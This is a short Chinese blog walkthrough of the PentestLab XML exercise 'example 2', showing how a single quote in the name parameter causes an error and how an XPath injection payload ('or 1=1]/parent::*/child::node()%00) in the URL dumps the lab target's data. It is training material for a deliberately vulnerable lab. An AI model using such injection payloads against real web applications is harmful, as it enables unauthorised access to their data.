PentestLab-web安全XML测试-EXP2-CFANZ编程社区

PentestLab-web安全XML测试-EXP2

前端王祖蓝

阅读 36

2023-04-13

我们打开靶机

选择“example 2”

PentestLab-web安全XML测试-EXP2_单引号

观察页面

PentestLab-web安全XML测试-EXP2_php_02

我们尝试修改name参数

http://192.168.20.157/xml/example2.php?name=hacker%27

PentestLab-web安全XML测试-EXP2_xml_03

添加单引号报错

存在闭合的可能性

网上大神payload

为

hacker'or 1=1]/parent::*/ child::node()%00

完整的payload为

http://192.168.20.157/xml/example2.php?name=hacker%27or%201=1]/parent::*/%20child::node()%00

结果

PentestLab-web安全XML测试-EXP2_单引号_04

我们打开靶机

观察源码

PentestLab-web安全XML测试-EXP2_xml_05

上面的payload闭合了xpath参数

相关推荐
钵仔糕的波波仔
 PentestLab-web安全LDAP测试-EXP2
钵仔糕的波波仔 50 0 0
孟佳
 PentestLab-web安全SQL注入-EXP2
孟佳 44 0 0
猫er聆听没落的旋律
 PentestLab-web安全目录穿越-EXP2
猫er聆听没落的旋律 58 0 0
辰鑫chenxin
 PentestLab-web安全命令注入-EXP2
辰鑫chenxin 49 0 0
老榆
 PentestLab-web安全文件上传测试-EXP2
老榆 53 0 0
上善若水山西太原
 PentestLab-web安全文件包含-EXP2
上善若水山西太原 80 0 0
玩物励志老乐
 PentestLab-web安全文件上传测试-EXP1
玩物励志老乐 62 0 0
酷子腿长一米八
 PentestLab-web安全SQL注入-EXP5
酷子腿长一米八 37 0 0
萧让听雪
 PentestLab-web安全命令注入-EXP1
萧让听雪 35 0 0
彩虹_bd07
 PentestLab-web安全SQL注入-EXP6
彩虹_bd07 50 0 0

精彩评论（0）